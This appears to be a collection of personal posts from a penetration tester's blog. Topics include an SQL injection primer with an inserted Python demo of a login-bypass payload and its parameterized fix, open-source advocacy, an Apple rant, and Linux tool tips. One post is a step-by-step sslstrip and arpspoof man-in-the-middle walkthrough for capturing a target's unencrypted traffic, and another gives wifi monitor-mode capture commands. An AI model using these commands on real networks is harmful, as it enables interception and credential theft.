So I’ve noticed something; my post count is abysmal. I never seem to say anything at all.
I suppose this could be a good thing. Perhaps it shows that I am just too busy doing work and I don’t have time to talk about work. Alternatively, I suppose it could indicate a certain freedom from the shackles of the digital world and that I do, indeed, have a life which does not require a lithium battery to operate. Then again, perhaps it just shows that I’m a lazy bastard…
Well, no more! Starting here, I have a multi-part posting that will be informative, humorous and hopefully long enough to indicate a certain amount of interest in this blog (not your interest, dear reader… mine). Let’s talk about SQL injection attacks.
SQL injection, you say? What an excellent idea! After all, OWASP (https://www.owasp.org/index.php/OWASP_Top_Ten_Project#Main) continually rates it as the number one web app vulnerability facing us today… so let’s learn more!
Glad you agree, I say!
But, you ask, isn’t there plenty of information about this exploit available already?
Shut your pie hole, I say! You can never get enough of a good thing!
Sheesh! Now that we have that out of the way and you feel appropriately chastised, let’s get started, eh?
———————————————
Ok, first of all (just in case), let’s make sure we all understand exactly what SQL is;
SQL stands for “Structured Query Language” and it is this language which is used to maintain data within a relational database (http://en.wikipedia.org/wiki/Relational_database). Data such as names, places, quantities or descriptions of items (or individuals) are stored within the “SQL database” and by utilizing SQL commands, an individual or application may create, access, edit or delete the data which the database holds. Typical examples from the internet might be user logon pages or an online shopping cart. There are several different flavors of SQL (read: vendors). We are going to focus on MySQL (http://mysql.com/). Why? Because I said so.
Simple, right?
Alright then. Now let’s make sure we all have a grasp of what an “injection” attack is;
I’m thinking it wouldn’t take you very long to find a web page that has a logon form. That good old request for your username (or email) and your password. The basic logic behind this is fairly straightforward; you are being asked to identify yourself and then to prove it. The application then looks at the SQL database and sees if you are in there. If you are, it verifies your password and gives you whatever you are allowed to have based on your identity’s allowed level of access, or; “permissions”. So far, so good… right?
Ok, well let’s assume that instead of entering your username, you instead entered (injected) a SQL command into the username field that said “show me everybody’s usernames”. The application, thinking that your entry was just a username, would forward that entry to the SQL database (assuming that it was vulnerable to such attacks) and the database would then interpret the command and do exactly what it was told to do… show you everyone’s usernames. There you have it… you just used a “SQL injection” attack to gather information from a database that you should not have had access to. Congratulations!
We’ll go over exactly this sort of example in later posts, so relax if the details are still a bit fuzzy for you. However, before we get into working with the “injection” portion, we’re going to work a bit with the “SQL” part of this equation. There are plenty of automated tools which will audit a web application and attempt to determine if it is vulnerable to this sort of attack. If you just want to be a button pusher, stop reading my damn posts and go use one of those. However, if you want to be a bit smarter than the tools that you employ, cross your fingers and stick around for just a bit longer!
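To make the logon-form example above concrete, here is an added illustration (it is not part of the original post): a login check that splices the username and password straight into the query text, beside the parameterized version that the application should have used. It uses Python’s built-in sqlite3 module so it runs offline; the users table, its three rows and the credentials are constructed for the example, and the same cursor.execute(sql, params) shape applies to the MySQL drivers (which use %s placeholders instead of ?).

```python
import sqlite3

# Constructed sample data: an in-memory SQLite table standing in for the MySQL
# users table a logon page would query. (A real table would hold password
# hashes, not plaintext; the point here is only how the query gets built.)
SAMPLE_USERS = [("alice", "hunter2"), ("bob", "swordfish"), ("carol", "letmein")]


def make_db():
    """Create the throwaway database and load the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    conn.commit()
    return conn


def build_query_vulnerable(username, password):
    """Splice the form fields directly into the SQL text.

    Whatever the user typed becomes part of the statement the database parses,
    which is exactly the "injection" the post describes.
    """
    return (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )


def login_vulnerable(conn, username, password):
    """Return the usernames the database matched for this login attempt."""
    sql = build_query_vulnerable(username, password)
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password):
    """Parameterized query: the SQL text is fixed and the values travel separately.

    The driver hands the two strings to the database as data, so a quote or a
    comment marker inside them is just characters to compare, never SQL.
    """
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


if __name__ == "__main__":
    db = make_db()
    # A normal login behaves the same either way.
    print(login_vulnerable(db, "alice", "hunter2"))  # ['alice']
    print(login_safe(db, "alice", "hunter2"))        # ['alice']
    # A username written as SQL turns the WHERE clause into "always true" and
    # comments out the password check in the concatenated version...
    crafted = "' OR '1'='1' --"
    print(build_query_vulnerable(crafted, "anything"))
    print(login_vulnerable(db, crafted, "anything"))  # every username in the table
    # ...but is just an odd-looking username to the parameterized one.
    print(login_safe(db, crafted, "anything"))        # []
```

Run it and compare the two printed lists for the crafted username: the concatenated query hands back every account (the “show me everybody’s usernames” case from the post), while the parameterized query matches nobody because the crafted text never reaches the SQL parser as SQL.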
Now let’s set up our environment.
So here’s the deal; to really understand SQL injection attacks, you need to understand SQL. I’m not saying that you need to be an expert database administrator, but you really need to know your way around a bit. To that end, I want to go through managing a local MySQL server and getting comfortable with manipulating database/table data.
I happen to have, right here in front of me, a fresh install of BackTrack 5R2 (http://www.backtrack-linux.org/downloads/) with the Gnome interface. It isn’t mandatory, but let’s say it is strongly suggested that you work from the same platform. Otherwise, you are pretty much on your own here and the rest of this post will make a lot less sense…
The first thing we want to do is fire up our local instance of the MySQL server. We could do so from the menu (navigate to Applications > Backtrack > Services > MySQLD), but I think that whenever possible we need to be at the command line. So, from the terminal you start a service like so:
# service <service> <action>
On our BackTrack system, you can find the list of installed, available services within the /etc/init.d directory (such as /etc/init.d/mysql). Most services will have three available actions; start, stop and restart. Let’s try to start our MySQL server:
# service mysql start
which should return a status something like this:
mysql start/running, process 12345
the last part would be the “process ID” and would change for each running instance.
To stop or restart the mysql process, simply issue the appropriate command:
# service mysql stop
# service mysql restart
Ok, before we go a lot further, let’s look at some background information for homework research (http://en.wikipedia.org/wiki/MySQL)! Besides, the post word count is getting a bit high and I don’t want to ruin all the surprises at once…
In the next post we are going to learn some basic SQL commands and how to use them to create, manipulate and delete not only data but the databases that hold that data.
see you there!
~me
Four years ago, give or take, Gartner Technology Group had this to say about open source software and its emerging role in the enterprise:
By 2012, 80 per cent of all commercial software will include elements of open source technology. Many technologies are mature, stable, and well supported. They provide significant opportunities for vendors and users to lower their total cost of ownership and increase returns on investment. Ignoring this will put companies at a serious competitive disadvantage.
I’m willing to go a step further; as of 2012, the typical small to mid-sized enterprise (with limited resources requiring third-party support options) can easily support their mission needs and IT infrastructure entirely with open source software. Most of these open source offerings would be free (as in puppies), although in some cases certain advantages could certainly be gained by paying for an advanced version of the software or elevated support options.
In addition, many of these open source offerings represent best-of-breed solutions and in at least a couple of instances (snort and apache, for instance) are, in my opinion, the de facto standard.
Virtualization has Xen, ThinClients have Thinstation. SecurityOnion, PacketFence, FreeNAS, Bacula, AlienVault, TripWire, Wireshark, Splunk, Smoothwall, Nagios, Funambol, Asterisk… I could run out of (virtual) ink just trying to list them all.
Don’t sell your clients/employers short simply because there is an expensive, over the counter solution to their need. Do your homework and ensure that you are really giving them the best that you can, tailored to their exact needs.
Maybe they’ll use all that extra cash to pay you more… just saying.
~me
so, im writing this from an airport lounge. i had to go through a bag search, two ID checks and one of those creepy full-body imaging scans to get here in the first place, now i had to do it again just to get back home. i feel fairly vetted at this point. dirty…but vetted.
im here because i just finished up a pen-test for several vendors who are hoping to do business with the federal government. the exercise was conducted on-site at the local Air Force base, so i was expecting that i would have to go through pretty much more of the same in order to get anywhere near where they are keeping all the alien spacecraft and Jimmy Hoffa’s remains.
not so much, it turns out.
here’s the short of it: i am absolutely appalled.
most of my days are spent hired-out to a civilian branch of the feds. I don’t do a ton of work for DoD or any of the other military sectors. It has always been my understanding that any work for the military side would entail heightened security. the scary fact is this; aside from an ID check (which was performed by contractor security staff) to get onto the base in the first place, absolutely nobody ever questioned my presence in the least. not once.
i entered buildings, i wandered halls, i opened doors. i talked to people… i even took pictures. i did all of this without a badge or an escort and i did it within the confines of several structures that deal with some fairly high level research. nobody cared.
the airport gave me more of a run-down than physical access to the heart of a military installation did.
my work for the civilian branch of the government has guards at every entrance of a building, requires key card access to go anywhere. escorts for visitors, cameras in every corner and locked doors to keep you honest.
turns out Hoffa ain’t dead. he’s researching alien technology for the feds.
he says hi, by the way.
~me
Back in the days when Steve Jobs was trying to reinvent Apple as a multimedia company (as opposed to a computer company) he did a very intelligent thing. It was a thing that neither he (nor, by proxy; Apple) really had a history of doing; he released Apple software for a non-Apple platform. I am speaking, of course, of iTunes for Windows.
This proved instrumental in the reinvention of Apple. How could they have ever dominated the music player/cell phone industry without releasing iTunes to the other 95% -ish of home computer users?
(well, the true answer is that they could have done away with ridiculous activation/media management restrictions that they place on their devices… but stick with me on this)
Now, as a linux user (and an iPhone owner), this leaves me in a bit of a quandary. Apple, to date, refuses to develop a version of iTunes for linux. I can only assume that this business decision was made for one of two reasons;
1. Apple decided that the linux demographic was simply too small to bother with. Instead of spending resources attempting to develop an iTunes version for linux, simply let them fend for themselves.
or…
2. Apple decided that instead of developing iTunes for linux, they should instead force linux-based iDevice users to migrate to an Apple product (or perhaps iTunes for Windows) in order to activate/manage their iDevices.
If reason #1 were the issue, I would completely understand. No problem. After all, the linux community is comprised of an overwhelming majority of geeks (ok, let’s say “power users“) who can fend for themselves just fine. However, time has proven that it is indeed reason #2. Allow me to explain;
It truly did not take long at all for the linux community to reverse-engineer the iDevice requirements and develop support for these devices into linux-based media management software (e.g. Rhythmbox, Amarok or Banshee, all similar to iTunes in scope). Therefore, the problem was solved. We could now transfer our music, movies, podcasts, what-have-you to our iDevices and everybody wins.
Apple immediately built an “update” to their iDevices which crippled the linux functionality.
Let’s be clear; crippling linux functionality wasn’t a “side-effect” of the update, it was the express intent of the update.
And so it began. Apple releases the update which breaks iDevice support in linux, the linux community then takes a month or so to determine the nature of the change and updates their software to accommodate. Apple retaliates with another update… ad nauseam.
Is Steve Jobs so arrogant as to believe that any significant portion of linux users will abandon their operating system simply in order to maintain functionality of their pod/phone/tablet? Apparently so.
This clearly cannot be an instance of “simply ignoring the linux community”, Apple is spending significant resources to actively wage war on us.
Apple enjoys a devout following. Its users are religiously devoted to the “cult of personality” which envelops everything that they make. I get that, I really do. I happen to like the products that Apple puts out. However, this attitude is nothing in the face of the jihadist attitude saturating the open-source community (and linux in specific).
I have a prodigious media collection. So large, in fact, that iTunes could not deal with it even if I were so inclined (trust me, I’ve tried). I also spend nearly three hours each work-day on the road. Obviously, aside from communicating, the main purpose of my iPhone is for music playback.
At this point, I have once again lost the ability to manage my media via my linux-based mediacenter. With the rise of the Android OS as a major player in the market, I am simply in awe of the sheer stupidity being displayed by Apple.
I’ll make the switch, Apple. But I don’t think it is the switch that you were hoping for.
As a side-note, the HTC Sensation (http://www.knowyourmobile.com/comparisons/855860/htc_sensation_vs_apple_iphone_4.html) is looking really sexy. You should check it out, Steve… I know I will.
~me
Ok, let’s rant about one of my pet-peeves (and boy isn’t that a list):
Ever go to one of those websites that uses SSL encryption and boldly states something like;
“We use SSL encryption to protect your data. This site is certified as absolutely secure! We DARE anyone to try to steal your information, you can feel perfectly safe telling us all your dirty little secrets”.
So, you go ahead and throw in your credit card numbers, banking information, girlfriend’s hat size, whatever. After all, they said it was safe, right?
Ok, let’s not even bring up the dozens of ways that SSL doesn’t cover you (XSS, SQL injection, etc…), let’s just focus on how easy it is to circumnavigate it in the first damn place. Ready? Ok, here we go:
First of all, let’s make sure we have a nice little attack platform set up. I’ll use BackTrack 4R2, you use whatever you like.
Next, let’s make sure we have a nice little tool known as “sslstrip” installed (i do, i’ll wait here if you need to go get it).
sslstrip is the tool that does the work once you are sitting in a MITM (man-in-the-middle) position. It intercepts the victim’s web traffic, takes what it wants and then forwards it on down the line. Getting into that position is a classic arp-spoof attack at its simplest.
First, we need to make sure that our system will actually forward the data that it receives from the victim. To enable IP forwarding in the kernel, I’ll enter the following command:
# echo 1 > /proc/sys/net/ipv4/ip_forward
The next thing I’ll do is tell my system to forward any TCP packets that it gets from port 80 (the victim’s web browsing) to another port so that sslstrip can monitor, record and send it on down the line without interfering with whatever else I’m doing in the meantime:
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 12345
The port that you forward the traffic to is fairly irrelevant, just make sure that you aren’t stepping all over existing traffic.
Ok, so let’s convince our target that we are their gateway to the world. Just like St. Louis. Wait, that’s the gateway to the west. Sorry. Anyway, you obviously need to know two things; the IP address of your target and the IP address of their gateway. Once you have that, the command you want is this (oh, yeh… did i mention you needed arpspoof?):
# arpspoof -i interface -t target_ip gateway_ip
Lastly, let’s start up sslstrip, tell it to listen (-l) on the port that the iptables rule redirects to, and tell it to write (-w) what it sees to a log file. My log files take the form of “target_date_time_tool” with the time being in UTC. So, for me the command would look something like this:
# sslstrip -l 12345 -w ~/forensics/engagement/target_yyyy_mm_dd_2400UTC_sslstrip
…and we go read a book. Depending on the traffic generated, we may even have time to go write a book.
If everything goes well, we convince the target that to get anywhere at all they have to go through us. We then log all their information and forward it to wherever they were trying to go. The important difference is that what the target sends us is unencrypted. Let this cook for a while and then check the log file for goodies…
Happy hunting!
~me
having a dedicated pentest system is extremely convenient, if not essential. i use a modified backtrack 4r2 system (greybox), installed locally and using flux as its window manager. boot disks have their place, but i also like to know that my work has a persistent home.
one pain, however, is that locking the screen is a bit of a chore. the largest hurdle; xscreensaver simply refuses to function under root logon. i could create non-root users, which in most other cases would be best anyway, but in this instance it creates a series of other issues i’d rather not deal with.
here are a few quick steps that will get an auto-locking screen using root login and fluxbox. this isn’t the only solution, but it is certainly simple and effective.
first, let’s install two packages:
# apt-get install xautolock xlockmore
…and now, let’s open up the fluxbox startup script:
# pico ~/.fluxbox/startup
…and let’s add a couple of lines (make sure they are above ‘exec fluxbox’):
# autolocks X screen after 15 minutes of inactivity
xautolock -time 15 -locker "xlock -mode blank" -secure &
that’s it. no mess or fuss. save and exit. go ahead and manually run the xautolock command as it is listed above to start it now (or just restart fluxbox).
# airmon-ng
-- determines applicable interfaces
# airmon-ng stop interface
# airmon-ng start interface
-- this puts the interface into monitor mode via an interface alias (most likely mon0)
# airodump-ng -w /path/to/file/target_yyyy_mm_dd_2400UTC_tool --output-format pcap,csv InterfaceAlias
-- this starts the airodump-ng scan, displays results and writes our files.
** 's' changes sorting options, for instance by power level ('d' resets defaults)
** 'r' (de)activates real-time sorting
** 'SPACE' pauses the display
** 'TAB' (de)activates scrolling selections
** 'm' highlights the selection (and associated stations) in one of several color choices
** 'CTL+Z' to close airodump-ng
if you need to do a quick conversion to UTC, try this:
# date --utc
i had hoped that getting the awus036nh to work in BT4R1 was going to be a relatively simple issue…
i made sure that the system was updated and upgraded via apt, then;
# apt-get install firmware-ralink
# cd /usr/src/drivers/compat-wireless-2010-07-10
# ./scripts/driver-select rt2x00
# make
# make install
# make unload
# modprobe rt2800usb
there was a misconfiguration issue of the AP and interface (mon0) being reported as on different channels via aireplay-ng. i downloaded the patch (http://www.backtrack-linux.org/forums/backtrack-howtos/31264-howto-alfa-802-11a-b-g-n-awus050nh-rt2800usb-backtrack-4-r1-2.html) and compiled:
# cp chan.patch /usr/src/drivers/compat-wireless-2010-07-10/net/wireless/
# cd /usr/src/drivers/compat-wireless-2010-07-10/net/wireless
# patch -p0 < chan.patch
unfortunately, not so easy.
problem 1: while the alfa did work, it was constantly dropping the connection.
problem 2: the internal bcm43xxx stopped seeing anything at all.
i tried several solutions (including the re-install of b43-fwcutter) but no love, really.
luckily, BT4R2 came out so i did a rip/replace upgrade and apparently everything is working right out of the box…
still dropping signal way too much, but we’ll see what we can do about that.
amen to muts, et al.
~me